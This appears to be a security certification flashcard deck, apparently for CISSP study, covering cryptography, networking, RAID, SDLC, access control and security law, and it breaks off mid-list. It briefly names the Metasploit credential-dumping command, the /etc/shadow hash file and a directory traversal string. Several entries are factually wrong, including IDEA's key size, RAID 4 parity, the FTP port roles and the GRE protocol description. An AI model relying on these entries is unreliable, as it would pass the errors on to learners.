Computer system that is running malware and is controlled via a botnet. Used to steal info, DoS, send spam.

System Unit

Computer's case. Contains all of the internal electronic components. Motherboard, disk drives, power supply.

CASE

Computer-Aided Software Engineering uses programs to assist in the creation and maintenance of other computer programs. Tools, workbenches, environments. 4th gen languages often use CASE.

Title 18 U.S.C. Section 242

Deprivation of Rights Under Color of Law

Operations Security

Concerns systems and data. About people, data, media, and hardware; all of which are elements that need to be considered from a security perspective

NIST SDLC Step 3

Conduct a Sensitivity Assessment: Look at the security sensitivity of the system and the information to be processed.

OCTAVE Phase 3

Conducts the Risk Analysis. Develops Risk Mitigation Strategy.

True Positive Example

Conficker worm is spreading on a trusted network, and NIDS alerts

False Negative

Conficker worm is spreading on a trusted network, and NIDS is silent

Object(Labels)

Confidential, Secret, Top Secret. EO 12356

CIA

Confidentiality, Integrity, Availability

CCB

Configuration Control Board - Establishment of and charter for a group of qualified people with responsibility for the process of controlling and approving changes throughout the development and operational lifecycle of products and systems

Real Evidence

Consists of tangible or physical objects. USB Storage, DVDs, Hard Drives, Printed Business Records.

Basic Input Output System(BIOS)

Contains code in firmware that executes when a PC is powered on. It first runs the Power-On Self-Test (POST).

Motherboard

Contains hardware. Firmware, Memory slots, CPU, etc.

CDN

Content Delivery Networks. Akamai, Amazon CloudFront, CloudFlare. CDNs also increase availability and can reduce the effects of denial of service attacks. 75-140ms range, but it can be significantly higher, especially for mobile users accessing a site over a 3G network

NIST SP 800-34

Contingency Planning Guide for Federal Information Systems

COBIT

Control Objectives for Information and related Technology is a control framework for employing information security governance best practices within an organization. Provides IT Governance Model.

***EXAM WARNING***

Control types on the exam, do not memorize examples: instead look for the context. Firewall is a good example of a preventative control. A lock is a good example of a preventive physical control

COCOM

Coordinating Committee for Multilateral Export Controls. In effect from 1947 to 1994. Charter COCOM members include Japan, Australia, Turkey, and much of the rest of the non-Soviet controlled countries.

Single Loss Expectancy (SLE)

Cost of One Loss

Common SQL Commands

Create, Select, Delete, Insert, Update

Spiral Model

Created by Barry W. Boehm. The model creates a risk-driven approach to the software process rather than a primarily document-driven or code-driven process

The TCP/IP Model

Created by DARPA in the 1970s. The formal name is the Internet Protocol Suite.

Wassenaar Arrangement

Created in 1996, relaxed many restrictions on exporting cryptography.

CER

Crossover Error Rate describes the point where the False Reject Rate (FRR) and False Accept Rate (FAR) are equal.

CIRP

Cyber Incident Response Plan is designed to respond to disruptive cyber events, including network-based attacks, worms, computer viruses, Trojan horses, etc.

Fire Class D

D: Combustible Metals: magnesium, zinc, calcium, titanium, lithium

Discretionary Access Control

DAC gives subjects full control of objects they have created or been given access to, including sharing the objects with other subjects

Data Query Languages

DDL(Data Definition Language) DML(Data Manipulation Language)

Direct Sequence Spread Spectrum

DSSS uses the entire band at once, "spreading" the signal throughout the band

DCE

Data Circuit Terminating Equipment. A device that networks DTEs, like a router. DCE marks the end of ISP's network. DTE is responsibility of customer.

DES

Data Encryption Standard. Standard symmetric cipher developed in 1976. Created due to a lack of a cryptographic standard. IBM designed it, basing it on Lucifer (an older symmetric cipher). ***DESCRIBES DEA***

Types of Integrity

Data Integrity and System Integrity

DTE

Data Terminal Equipment. Any type of network connected user machine(terminal)

Metadata

Data about data

Unconstrained Data Item (UDI)

Data that does not require integrity. Assurance is based upon integrity verification procedures (IVPs) that ensure that data are kept in a valid state.

Remanence

Data that persists beyond noninvasive means to delete it

DBA

Database Administrators

DBMS

Database Management System

Database Shadowing

Database shadowing uses two or more identical databases

Restore/Rollback(Databases)

Databases can rollback/restore to a prior restore point

Address Space Layout Randomization

Decreases the likelihood of successful exploitation by making the memory addresses employed by the system less predictable. This complicates developing exploits and building post-exploitation capabilities that leverage existing code execution. Not guaranteed to prevent exploitation.

DARPA

Defense Advanced Research Projects Agency

Outsiders

Defined as unauthorized attackers with no authorized privileged access to a system or organization.

Demarc

Demarcation Point. The point where the DTE and DCE meet. ISP responsibility ends and the customer's begins. The circuit uses a "clock signal": both sides must synchronize to a clock signal provided by the DCE (Channel Service Unit/CSU).

DMZ

Demilitarized Zone Network. Network servers receiving traffic from untrusted networks should be placed on the DMZ networks. Assume that any DMZ host may be compromised. A classic DMZ uses two firewalls vs. a single-firewall DMZ (3-legged DMZ).

Denial-of-Service Attacks

Denial-of-Service attacks work by simply polluting the wireless spectrum with noise

SSH

Designed as a secure replacement for Telnet, FTP, and the UNIX "R" commands (rlogin, rshell, etc). Provides confidentiality, integrity, and secure authentication. S("SSH")FTP, SCP(Secure Copy) for transferring files. SSH listens on port 22.

Government clouds

Designed to keep data and resources geographically contained

Wireless Application Protocol

Designed to provide secure Web services to handheld wireless devices such as smart phones. WAP is based on HTML, and includes HDML (Handheld Device Markup Language). A WAP browser is a microbrowser, simpler than a full Web browser, and requiring fewer resources

Reformatting

Destroys the original FAT and replaces it with a new one. In both cases the data remains and can be recovered, unlike writing 0's or random characters.

IAB Practice 4

Destroys the integrity of computer-based information

Degaussing

Destruction of magnetic media using other magnets. Ensures integrity is affected.

Detection

Detection (also called identification) is the phase in which events are analyzed in order to determine whether these events might comprise a security incident

NIST SDLC Step 5

Determine Security Requirements: Determine technical features (like access controls), assurances (like background checks for system developers), or operational practices (like awareness and training).

Asymmetric Encryption

Diffie-Hellman key exchange in 1976. The RSA algorithm was invented in 1977 (Rivest, Shamir, Adleman). A mathematical breakthrough. Uses two keys: if you encrypt with one key, you may decrypt with the other. Also called public key encryption; the public key may be posted publicly. Once encrypted with the public key, the same key cannot be used to decrypt; only the private key can do so. Used for digital signatures. Asymmetric methods use one-way functions.

DSL

Digital Subscriber Lines use existing copper pairs to provide digital service to homes and small offices. Speeds 10 mb or more. SDSL (Symmetric), ADSL (Asymmetric), VDSL (Very High Rate), and HDSL (High Data Rate).

DSSS

Direct Sequence Spread Spectrum uses the entire band at once, "spreading" the signal throughout the band.

Real Memory

Directly accessible by the CPU and is used to hold instructions

Opposing Forces to CIA

Disclosure(Confidentiality), Alteration(Integrity), Destruction(Availability)

TCSEC Division C

Discretionary Protection means Discretionary Access Control (DAC) systems. Includes class C1 (Discretionary Security Protection) and C2 (Controlled Access Protection).

Guidelines

Discretionary, useful pieces of advice, such as "to create a strong password."

NIST SDLC Step 16

Disposal: The secure decommission of a system.

SDLC 10

Disposition

IAB Practice 2

Disrupts the intended use of the Internet

RIP

Distance Vector Routing Protocol. Uses hop count as metric. Does not have full view of the network; lacks convergence

DNP3

Distributed Network Protocol provides an open standard used primarily within the energy sector. Provides interoperability between various vendors' SCADA and smart grid applications. Seen in the US Department of Energy.

First Normal Form (1NF)

Divide data into tables.

****EXAM WARNING****

Do not confuse Service Oriented Architecture (SOA) with SOAP. Different concepts.

Need to know

Does the user "need to know" the specific data they may attempt to access? More granular than least privilege.

Ethics

Doing what is morally right, e.g., the Hippocratic Oath. Treat sensitive information ethically.

DNSSEC

Domain Name System Security Extensions provide authentication and integrity to DNS responses via the use of public key encryption

Acquisitions

Due diligence requires a thorough risk assessment of any acquired company's information security program.

Object Reuse Attacks

Dumpster Diving, Recovering Info from Unallocated Blocks on a Disk Drive. Cleaning and destruction should follow a formal policy.

ITSEC/TCSEC Ratings

E0: D; F-C1, E1: C1; F-C2, E2: C2; F-B1, E4: B1; F-B2, E4: B2; F-B3, E5: B3; F-B3, E6: A1. Additional functionality ratings: F-IN: high integrity requirements; F-AV: high availability requirements; F-DI: high integrity requirements for networks; F-DC: high confidentiality requirements for networks; F-DX: high integrity and confidentiality requirements for networks. See: http://www.ssi.gouv.fr/site_documents/ITSEC/ITSEC-uk.pdf

E Carriers

E1s are dedicated 2.048-megabit circuits. An E3 bundles 16 E1s to form a 34.368-megabit circuit.

EAP-TTLS

EAP Tunneled Transport Layer Security; drops the client-side certificate requirement, allowing other authentication methods (such as password) for client-side authentication

EAP-FAST

EAP-Flexible Authentication via Secure Tunneling; was designed by Cisco to replace LEAP. It uses a Protected Access Credential (PAC), pre-shared key.

Types of EAP

EAP-MD5, LEAP, EAP-FAST, EAP-TLS, EAP-TTLS, and PEAP

EAP-TLS

EAP-Transport Layer Security. Uses PKI, requiring both server-side and client-side certificates. Costly.

Common Criteria: Levels of Evaluation

Each builds on the level of in-depth review of the preceding level. EAL1: Functionally tested; EAL2: Structurally tested; EAL3: Methodically tested and checked; EAL4: Methodically designed, tested, and reviewed; EAL5: Semi-formally designed and tested; EAL6: Semi-formally verified, designed, and tested; EAL7: Formally verified, designed, and tested.

Bus Topology

Each node inspects the data as it passes along the bus.

EMI

Electromagnetic Interference. Improperly shielded cables and circuits may suffer crosstalk from EMI. Mitigated via proper cable management.

5 Modes of DES

Electronic Code Book (ECB), Cipher Block Chaining (CBC), Cipher Feedback (CFB), Output Feedback (OFB), Counter Mode (CTR). ECB is the original mode; CBC, CFB, and OFB were added later. See NIST Special Pub 800-38a.

EEPROM

Electronically Erasable Programmable Read Only Memory may be "flashed," or erased and written to multiple times. The term "flashing" comes from ultraviolet light.

NonInterference Model

Ensures that data at different security domains remain separate from one another.

Antivirus

Employs heuristic or statistical methods for malware detection, but the predominant means of detecting malware is still signature-based. Not good for zero-day malware.

High Availability Clusters

Employs multiple systems that are already installed, configured, and plugged in, such that if a failure causes one of the systems to fail then the other can be seamlessly leveraged to maintain the availability of the service or application being provided.

ESP

Encapsulating Security Payload provides confidentiality by encrypting packet data.

Single DES

Encrypts 64-bit blocks with a 56-bit key. Weak against brute force.

Symmetric Encryption

Encryption that uses one key to encrypt and decrypt

EULA

End-User License Agreements can be in paper or electronic form

Endpoint Security

Endpoints are the targets of attacks; preventive and detective capabilities on the endpoints themselves provide a layer beyond network-centric security devices.

EPROM

Erasable Programmable Read Only Memory may be "flashed," or erased and written to multiple times.

CWE:Directory Path Traversal

Escaping from the root of a web server (such as /var/www) into the regular file system by referencing directories such as "../.."

Evidence Integrity

Evidence must be reliable during the course of its acquisition and analysis. Checksums ensure no data changes occurred. One-way hashes (MD5, SHA-1) are commonly used.

Agile Software Development

Evolved as a reaction to rigid software development models. The Agile Manifesto: "• Individuals and interactions over processes and tools • Working software over comprehensive documentation • Customer collaboration over contract negotiation • Responding to change over following a plan"

Hierarchical Databases

Example: the global Domain Name Service (DNS) servers form a global tree. The root name servers are the "root zone" at the base of the tree; individual DNS entries form the leaves.

***EXAM Warning***

Exam strongly prefers open over proprietary standards/protocols. CISCO's EIGRP is not open.

SSL, IPsec VPN

Examples of protocols used for encrypting data in motion.

XP

Extreme Programming ensures communication, simplicity, feedback, respect, and courage through: Planning (specifies the desired features); Paired programming (programmers work in teams); Forty-hour workweek; Total customer involvement; Detailed test procedures (unit tests).

False Accept Rate

FAR occurs when an unauthorized subject is accepted by the biometric system as valid. Also called a Type II error.

Broadcast MAC

FF:FF:FF:FF:FF:FF

Broadcast Address

FF:FF:FF:FF:FF:FF. Communications sent by computers via this address will reach other computers on the same VLAN but not other VLANs. Inter-VLAN communication requires Layer 3 routing.

Frequency Hopping Spread Spectrum

FHSS. For sending traffic via a radio band. Minimize interference.

False Reject Rate

FRR occurs when an authorized subject is rejected by the biometric system as unauthorized. Also called a Type I error

Claude Shannon

Father of information security

FIdM

Federated Identity Management applies Single Sign On (SSO) on a much wider scale: cross-organization to Internet. May use OpenID or SAML (Security Assertion Markup Language).

Examples of Physical Access Control

Fences, Gates, Lights, Cameras, Locks, Mantraps, and Guards.

FTP

File Transfer Protocol. Has no confidentiality or integrity. Ports 20 (Originates), 21 (Data transfer). Many firewalls will block Active FTP data.

Firewalls

Filter traffic between networks. TCP/IP packet filter and stateful firewalls make decisions based on Layers 3 and 4. Multihomed: multiple NICs connected to multiple different networks.

15:FIN

Finish a connection (gracefully)

Kaiser Permanente 2009

Fired/disciplined over 20 workers for violating policy (and possibly violating regulations such as HIPAA) for viewing Nadya Suleman's (Octomom) medical records without a need to know.

Heat Detectors

For when temperature exceeds an established safe baseline

Forensic Media Analysis

Forensic data typically comes from binary images of secondary storage and portable storage devices such as hard disk drives, USB flash drives, CDs, DVDs, and possibly associated cellular phones and mp3 players

FHSS

Frequency Hopping Spread Spectrum for sending traffic via a radio band. Designed to maximize throughput. Uses a number of small frequency channels throughout the band

GPL

GNU Public License • The freedom to use the software for any purpose, • The freedom to change the software to suit your needs, • The freedom to share the software with your friends and neighbors, • The freedom to share the changes you make.

802.1X Authentication

Generally bundled with additional security functionality such as: patch verification, antivirus signatures and definitions.

GRE

Generic Routing Encapsulation to pass PPP via IP, and uses TCP for a control channel (using TCP port 1723)

Enigma

German Cipher Machine

Binary Backup Tools

Ghost (when run with specific non-default switches enabled), AccessData's FTK, Guidance Software's EnCase.

GAN

Global Area Network, a global collection of WANs

GIG

Global Information Grid is the U.S. Department of Defense (DoD) global network, one of the largest private networks in the world

Chosen/Adaptive Plaintext Attack

Goal of deriving key. Usually launched against asymmetric crypto systems. Mirrors chosen plaintext attack in round 1

Environmental Controls

HVAC and Power are crucial factors that can impact server room security if not carefully maintained.

White hat hackers

Hackers who act legally, within the bounds of the law. Also known as ethical hackers.

Blackhats

Hackers who act maliciously

RAID 2

Hamming Code. Not considered commercially viable for hard disks and is not used. Requires either 14 or 39 hard disks and a specially designed hardware controller. Cost prohibitive.

Shredding

Hard-copy sensitive information needs to be shredded prior to disposal. Cross-cut shredding is preferred.

Dual Homed Host

Has two network interfaces. One connected to a trusted network and the other connected to an untrusted network.

HAVAL

Hash of Variable Length is a hashing algorithm that creates message digests of 128, 160, 192, or 224 bits.

HMAC

Hashed Message Authentication Code. Combines a shared key with Hash. IPsec uses HMAC

Combination locks

Have dials that must be turned to specific numbers. Shared combinations are a security concern.

x86 CPU

Have four rings. But most use rings 0 and 3 only.

Centralized Logging

Having logs in a central repository allows for more scalable security monitoring and intrusion detection capabilities

Task

Heavy Weight Process(HWP)

Security assessments

Holistic approach to assessing the effectiveness of access control. The goal is to broadly cover many other specific tests, to ensure that all aspects of access control are considered.

HIDS

Host-based Intrusion Detection Systems process information within the host. Tripwire protects system integrity by detecting changes to critical operating system files.

HIPS

Host-based Intrusion Prevention Systems process/block/permit information within the host.

HTTPS

Hypertext Transfer Protocol Secure transfers encrypted Web-based data via SSL/TLS(443)

HTTP

Hypertext Transfer Protocol used to transfer unencrypted Web-based data(80)

Two Basic Routing Protocols.

IGP: Interior Gateway Protocols EGP: Exterior Gateway Protocols.

IKE

IPsec can use a variety of protocols (MD5, TDES, AES, etc.) for confidentiality. Internet Key Exchange negotiates the algorithm selection process. The two sides of an IPsec tunnel usually use IKE to negotiate.

Tunnel Mode

IPsec can use either tunnel or transport mode. Tunnel mode is used by security gateways for point-to-point tunnels. ESP tunnel mode encrypts entire packets.

IPsec vs. SSL

IPsec makes fundamental changes to IP networking and the OS while SSL does not

IPsec

IPv4 has no built-in confidentiality. higher-layer protocols such as TLS are used to provide security

***Exam Warning***

ISC2 Code of Ethics is highly testable. You may be asked for the "best" ethical answer, when all answers are ethical, per the canons.

OCTAVE Phase 1

Identifies staff knowledge

OCTAVE Phase 2

Identifies vulnerabilities

Tailoring Process: 1

Identify and designate common controls in initial security control baselines

AAA

Identity and Authentication, Authorization, and Accountability

Identity

Identity is a claim that you are a specific person. "I am Person X." Identities must be unique

(IDaaS)

Identity is a required pre-condition to effectively manage confidentiality, integrity, and availability. Leverage cloud service for identity management.

SDLC 8

Implementation

NIST SDLC Step 8

Implementation: The system is tested and installed.

Countermeasures

Implemented to mitigate attacks. Multiple overlapping controls spanning across multiple domains. They enhance and support each other.

TRIM command

Improves garbage collection. TRIM is an attribute of the ATA Data Set Management Command. TRIM improves compatibility, endurance, and performance of drives.

Stateful Firewalls

Include state table that allows the firewall to compare current packets to previous ones. Slower than packet filters but far more secure. Will deny fraudulent packets based on previous state table entries.

ISC2 Code of Ethics

Includes the Preamble, Canons, and Guidance. Preamble(Intro), Canons(Mandatory), Guidelines(Advisory)

NIST SDLC Step 6

Incorporate Security Requirements Into Specifications: Ensure that the previously gathered information is incorporated in the project plan.

ITIL

Information Technology Infrastructure Library is a framework for providing best services in IT Service Management(ITSM). 5 Core Guidance Pubs 1. Service Strategy 2. Service Design 3. Service Transition 4. Service Operation 5. Continual Service Improvement

ITSEC

Information Technology Security Evaluation Criteria (ITSEC). First International Evaluation Model. Separates Functionality from Assurance. 2 types of Assurance: effectiveness(Q) and correctness(E)

NIST SDLC Step 17

Information: Information may be moved to another system, archived, discarded, or destroyed.

Iaas

Infrastructure as a Service

CMM

Initial Repeatable Defined Managed Optimizing

SDLC 1

Initiation

NIST SDLC Step 2

Initiation: The need for a system is expressed and the purpose of the system is documented

NIST SDLC Step 9

Install/Turn-On Controls: A system often comes with security features disabled. These need to be enabled and configured.

IDE

Integrated Drive Electronics Disk Drive

ISDN

Integrated Services Digital Network. An earlier attempt than Digital Subscriber Line to provide digital service via "copper pair". ISDN Basic Rate Interface (BRI) service provides two 64K channels. PRI (Primary Rate Interface) provides twenty-three 64K channels. Both have a 16K signaling channel. Sucked

SDLC 7

Integration and Test

Mesh topology

Interconnects network nodes to each other. Have superior availability

IGP

Interior Gateway Protocols RIP OSPF (Layer 3)

Private Sector Labels

Internal Use Only and Company Proprietary

IDEA

International Data Encryption Algorithm. Symmetric block cipher designed as an international replacement for DES. Uses a 12-bit key and 64-bit block size. Patent encumbrance and slow speed are problems.

ICMP

Internet Control Message Protocol, a helper protocol that helps Layer 3

IPsec

Internet Protocol Security. A suite of protocols that provide a cryptographic layer to both IPv4 and IPv6. Provides VPNs (Virtual Private Networks). Includes two primary protocols, Authentication Header (AH) and Encapsulating Security Payload (ESP), which provide similar functions. Sometimes IPsec has ISAKMP and IKE. IPsec is overly complex. Complexity is the enemy of security.

Contract Acceptance testing

It is performed against the contract's acceptance criteria for producing custom developed software.

Purple

Japanese encryption device

Privilege Monitoring

Job functions that warrant greater scrutiny include: account creation/modification/deletion, system reboots, data backup, data restoration, source code access, audit log access, security configuration capabilities, etc.

Fire Class K

K: Cooking Media -Veggie Oil -Animal Oils -Fats/Lards

Thread

Light Weight Process(LWP)

LDAP

Lightweight Directory Access Protocol provides a common open protocol for interfacing and querying directory service information provided by network operating systems. Port 389 via TCP

Switch

Like a bridge but with more than two ports. Best practice is to connect only one device per switch port. Provides traffic isolation by associating the MAC address of each computer and server with its port. Shrinks collision domains.

Narrow Scope

Limited Knowledge of asset that is being tested.

Linear Cryptanalysis

Linear cryptanalysis is a known plaintext attack where the cryptanalyst finds large amounts of plaintext/ciphertext pairs created with the same key

/etc/shadow

Linux stores hashes for passwords here

LAN

Local Area Network is a comparatively small network, typically confined to a building or an area

Crime(Site Selection)

Local crime rates are factored into site selection

Boot Sector

Located after POST is complete

Lockpicking

Lock picking is the art of opening a lock. All key locks can be picked or bumped

Phisher

Malicious attacker who sends emails to many people, infecting computers with malware to steal information.

System Owner

Manager responsible for the actual computers that house data. Ensures the hardware is physically secure and OSes are patched up to date.

TCSEC Division B

Mandatory Protection. Means Mandatory Access Control systems(MAC). Includes classes B1(Labeled Security Protection), B2 (Structured Protection) and B3(Security Domains). *Higher numbers are more secure.

CWE: SQL Injection

Manipulation of a back-end SQL server via a front-end web server.

Remote meeting technology

Many of these solutions are designed to tunnel through outbound SSL or TLS traffic, which can often pass via firewalls and any Web proxies

***EXAM WARNING***

Many organizations will opt for not implementing rotation of duties because of the cost associated with implementation. For the exam, be certain to appreciate that cost is always a consideration, and can trump the implementation of some controls.

Non-Disclosure Agreement(NDA)

Requires that employees or other persons privy to business-confidential information do not disclose it to, or work for, competitors in an unauthorized manner.

MTD = RTO + WRT

Maximum Tolerable Downtime = Recovery Time Objective + Work Recovery Time

MTD

Maximum Tolerable Downtime which describes the total time a system can be inoperable before an organization is severely impacted. Also MAD, MTO, and MAO

Disk Encryption/Decryption

May occur in software or hardware. Software-based solutions may tax the computer's performance, while hardware-based solutions offload the cryptographic work onto another

MTTR

Mean Time to Repair describes how long it will take to recover a specific failed system.

Convergence

Means providing services such as industrial controls, storage, and voice via Ethernet and TCP/IP.

MAN

Metropolitan Area Network is typically confined to a city, a zip code, a campus, or office park

NIST SDLC Step 18

Media Sanitization: There are three general methods of purging media: overwriting, degaussing (for magnetic media only), and destruction.[22]

Offline Media Storage

Media Storage Facilities are necessary for disaster recovery, potential legal proceedings, or other matters. Facility should be far enough removed from primary to avoid impact.

Reference Monitor

Mediates all access between subjects and objects

Reference Monitor

Mediates all access between subjects and objects. It enforces the system's security policy. Prevents a normal user from writing to a restricted file, like the system password file. Eg: in Mandatory Access Control (MAC), the reference monitor prevents a Secret subject from reading Top Secret data.

***EXAM WARNING***

Memorizing the specific steps of each SDLC is not required, but be sure to understand the logical (secure) flow of the SDLC process.

Memory Addressing

Memory values may be stored in CPU Registers, and General RAM. (Memory Location #YYYY, #ZZZZ)

Hashdump

Metasploit command that dumps password hashes from memory.

***EXAM WARNING***

Microsoft trust relationships fall into two categories: non-transitive and transitive. Non-transitive trusts only exist between two trust partners. Transitive trusts exist between two partners and all of their partner domains.

TCSEC Division D

Minimal Protection. This division describes TCSEC-evaluated systems that do not meet the requirements of higher divisions.

MOR

Minimum Operating Requirements describe the minimum environmental and connectivity requirements in order to operate computer equipment.

RAID 1

Mirrored Set perhaps the simplest of all RAID levels to understand. RAID 1 creates/writes an exact duplicate of all data to an additional disk.

Cisco

Multifunction device/chassis that can act as a router, switch, firewall, NIDS, etc. ***Exam will reference dedicated vs. multifunction***

Compartmented

Mode of operation where all subjects accessing the system have the necessary clearance but do not have the appropriate formal access approval nor need to know for all information in system. Objects are placed into compartments.

Microkernels

Modular kernels. A microkernel is usually smaller and has less native functionality than a typical monolithic kernel. Added functionality via Loadable Kernel Modules(LKM). Running modules in user mode(ring 3)

Fingerprints

Most widely used biometric control available today. Smartcards can carry fingerprint information. Fingerprint minutiae, specific details of fingerprint friction ridges

MD5

Most widely used, created by Ronald Rivest. Creates a 128-bit hash value based on any input length. MD6 is the newest version, published in 2008.

Second Normal Form (2NF)

Move data that is partially dependent on the primary key to another table

RAT

Remote Access Trojan

MPLS

Multiprotocol Label Switching. Provides a way to forward WAN data via labels.

S/MIME

Multipurpose Internet Mail Extensions. Provides a standard format for email, including character sets and attachments. S/MIME leverages PKI to encrypt and authenticate MIME-encoded email. Eg: S/MIME gateway.

Users

Must follow the rules. Must comply with mandatory policies, procedures, standards, etc.

Service Set Identifier

Must know the SSID before joining a WLAN.

Walls and Doors

NFPA fire-resistance rating shall not be less than one hour.

Normal Response Mode

NRM can transmit when given permission by the primary

Count-Down Timers

Needs to be both visible and audible

First Octet

Network

Components of Penetration Test

Network (Internet) Network (internal or DMZ) War dialing Wireless Physical (attempt to gain entrance into a facility or room)

NAC

Network Access Control: network device based solution supported by vendors including Cisco.

NAP

Network Access Protection: computer operating system based solution by Microsoft.

NAT

Network Address Translation is used to translate IP addresses. Translates RFC 1918 addresses as they traverse from the intranet to the Internet. NAT hides the origin of a packet; the source address is the gateway.

Promiscuous Network Access

Network Intrusion Detection Systems run in promiscuous mode. Normally requires super user access.

Types of Logs: Network Security Software/Hardware:

Network Security Software/Hardware: • Antivirus logs • IDS/IPS logs • Remote Access Software (such as VPN logs) • Web proxy • Vulnerability management • Authentication servers • Routers and firewalls

Types Of IDS/IPS

Network-based and host-based.

Microsoft NTFS Permissions

New Technology File System Read Write Read and Execute Modify Full Control (all encompassing)

Process States

New: process being created. Ready: process waiting to be executed by the CPU. Running: process being executed by the CPU. Blocked: waiting for I/O. Terminated: a completed process. Zombie: child process whose parent process is terminated.

FE-13

Newest substitute. Can be breathed

Social Engineering

No tech hacking. Uses Human Mind. An example of a social engineering attack combined with a client-side attack is emailing malware with a Subject line of "Category 5 Hurricane is about to hit Florida!"

Electronic Discovery

Pertains to legal counsel gaining access to pertinent electronic information during the pre-trial discovery phase of civil legal proceedings

Diskless Workstation

Normal POST, Loads TCP/IP Stack, and downloads kernel and OS using protocol like BOOTP or DHCP

Password policy compliance

Notifying users to change their passwords before they expire

Annual Rate of Occurrence(ARO)

Number of Losses per Year

OLE

Object Linking and Embedding is a way to link documents to other documents.

Java

Object Oriented Programming Language. Bytecode is platform independent and is run/interpreted on the Java Virtual Machine (JVM).

Quantitative Analysis

Objective analysis of hard numbers and assets. AV, EF, SLE are all examples of quantitative quantities.

Bell-LaPadula Model

Observes two rules: the Simple Security Property and the * (Star) Security Property. Focused on maintaining the confidentiality of objects.

NIST SDLC Step 7

Obtain the System and Related Security Activities: May include developing the system's security features, monitoring the development process itself for security problems, responding to changes, and monitoring threats.

OEP

Occupant Emergency Plan provides coordinated procedures for minimizing loss of life and injury

CWE: Buffer Overflow

Occurs when a programmer does not perform bounds checking

Tailgating

Occurs when an unauthorized person follows an authorized person into a building after unlock/authenticating. Often combined with social engineering.

X.25

Older. X.25 provided a cost-effective way to transmit data over long distances in the 1970s through early 1990s

One Time Pad

One Time Key. Discarded after one use. Provably unbreakable form of crypto.

Limitation of Overwriting

One cannot tell if a drive has been securely overwritten by simply looking at it. Errors made during overwriting can lead to data exposure.

California Senate Bill 1386 (SB1386)

One of the first US state level breach notification laws. Requires organizations suffering a personal data breach to notify customers of the potential disclosure.

Simplex

One way communication

OCSP

Online Certificate Status Protocol. Replacement for CRLs, and uses client server. Scales better than CRLs

Incremental

Only archive files that have changed since the last backup of any kind was performed. EX: On Monday's backup, only those files that have been changed since Sunday's backup will be marked for backup

OSPF

Open Shortest Path First is a link state routing protocol that learns the entire network topology for their "area". Send event driven updates.

Master Key

Opens any lock for a given security zone in a building

Circuit Level Proxies

Operate at Layer 5 (Session Layer). SOCKS is the most popular circuit-level proxy, on TCP port 1080. Applications need to be configured to support SOCKS.

NIST SDLC Step 12

Operation/Maintenance: The system is modified by the addition of hardware and software and by other events.

NIST SDLC Step 14

Operational Assurance: Examines whether a system is operated according to its current security requirements.

OPEX

Operational Expense. Routers and Switches OPEX is low. NIDS, NIPS, and AV are high.

OCTAVE

Operationally Critical Threat, Asset, and Vulnerability Evaluation, a risk management framework from Carnegie Mellon University. Describes a three-phase process for managing risk.

ROM Chips

PROM, EPROM, and EEPROM.

Pen Test Methodology

PRSVER Planning Reconnaissance Scanning Vulnerability Assessment Exploitation Reporting

10:URG

Packet contains urgent data

IP Fragmentation

Packet exceeds the Maximum Transmission Unit (MTU), Router may fragment it. Fragmentation breaks a large packet into multiple smaller packets

PAP

Password Authentication Protocol. A very weak authentication protocol. Sends username and password in clear text.

PAP

Password Authentication Protocol. Defined by RFC 1334. A user enters a password and it is sent across the network in clear text

Cain & Abel

Password cracker application

Exposure Factor(EF)

Percentage of Asset Value Lost

PAN

Personal Area Networks range of 100 meters or much less. Low-power wireless technologies such as Bluetooth use PANs

Site Selection***EXAM WARNING***

Physical Safety of Personnel is a top priority

Deterrent Control Examples

Physical: "Beware of Dog" sign, Light Technical: Warning Banner at Login Administrative: Sanction Policy

Detective Control Examples

Physical: CCTV, Light Technical: IDS Administrative: Post-employment random drug tests

Preventive Control Examples

Physical: Lock, Mantrap Technical: Firewall Administrative: Pre-employment drug screening.

Bastion Host

Placed on the Internet and not protected by another device (firewall). Hardened to protect itself.

Syslog(Unencrypted)

Plaintext over UDP 514. The most widely used logging subsystem. Unreliable and connectionless UDP as a transport protocol for logs has implications for ensuring continuity of logging.

SDLC 3

Planning

Inline NIPS

Plays the role of a layer 3-7 firewall by passing or blocking traffic. NIPS provides defense in depth.

PPTP

Point-to-Point Tunneling Protocol tunnels PPP via IP

Security Control

Policies, procedures, and other administrative controls. Assessing the real-world effectiveness of administrative controls: change management, architectural review, penetration tests, vulnerability assessments, security audits.

Port Controls

Ports that may allow copying data to or from a system. Large amounts of information can be placed on a device small enough to evade perimeter contraband checks. Lock ports. EG: Directory Group Policy, Enterprise level port controls.

Collisions

The number of possible plaintexts is larger than the number of possible hashes, so different inputs can have the same fixed-length hash.

Lessons Learned

Post-incident activity. Provide a final report on the incident, which will be delivered to management

POST

Power-On Self-Test. Performs basic tests, including verifying the integrity of the BIOS, Testing the memory, Identifying devices, other tasks.

Background checks

Pre-Employment Screening

NIST SDLC Step 1

Prepare a Security Plan; Ensure that security is considered during all phases of the IT system life cycle

PGP

Pretty Good Privacy. Whole Disk Encryption for data at rest

Processes

Processes communicate between the rings via system calls.

3 Types of Policy

Program Policy, Issue-Specific- and System-Specific Policy.

Components of Program Policy

Purpose, Scope, Responsibilities, Compliance.

12:PSH

Push data to application layer

Compensating

Put in place to compensate for weaknesses in other controls. i.e surfing explicit web sites would be a cause for an employee to lose his/her job.

Raid Levels

RAID 0: Striped Set RAID 1: Mirrored Set RAID 3: Byte Level Striping with Dedicated Parity RAID 4: Block Level Striping with Distributed Parity. RAID 5: Block Level Striping with Distributed Parity RAID 6: Block Level Striping with Double Distributed Parity

IAB's Ethics and the Internet

RFC 1087; published 1987. Practices considered unethical behavior if someone purposefully committed.

IGPs

RIP OSPF

Real-time Transport Protocol

RTP. Common VoIP protocol. VoIP is based on data.

RFID

Radio Frequency Identification used to create wirelessly readable tags for animals or objects. Eg: Faraday Wallet/ Cage

RAD

Rapid Application Development rapidly develops software via the use of prototypes, "dummy" GUIs, back-end databases, and more.

Third normal Form

Remove data that is not dependent on the primary key. [35]

Stateless Autoconfiguration

Removes the requirement for DHCP

Linux/UNIX permissions

Read("r") Write("w") Execute("x") May be set separately to the owner, group, or world.

Fourth Amendment

Reasonable Search and Seizure

Repeater

Receives bits on one port and repeats them out the other port. (No Security)

Repeater

Receives bits on one port, repeats on another

Whole Disk Encryption

Recommended for ensuring confidentiality. Partial encryption, such as encrypted files, folders, or partitions, often risks exposing sensitive data stored in temporary files.

Watchdog Timer

Recover a system by rebooting after critical processes hang or crash

RPO

Recovery Point Objective is the amount of data loss or system inaccessibility (measured in time) that an organization can withstand

RTO

Recovery Time Objective describes the maximum time allowed to recover business or IT systems

Caller ID

Requires calling from the correct phone number. Caller ID can be easily forged

Inference

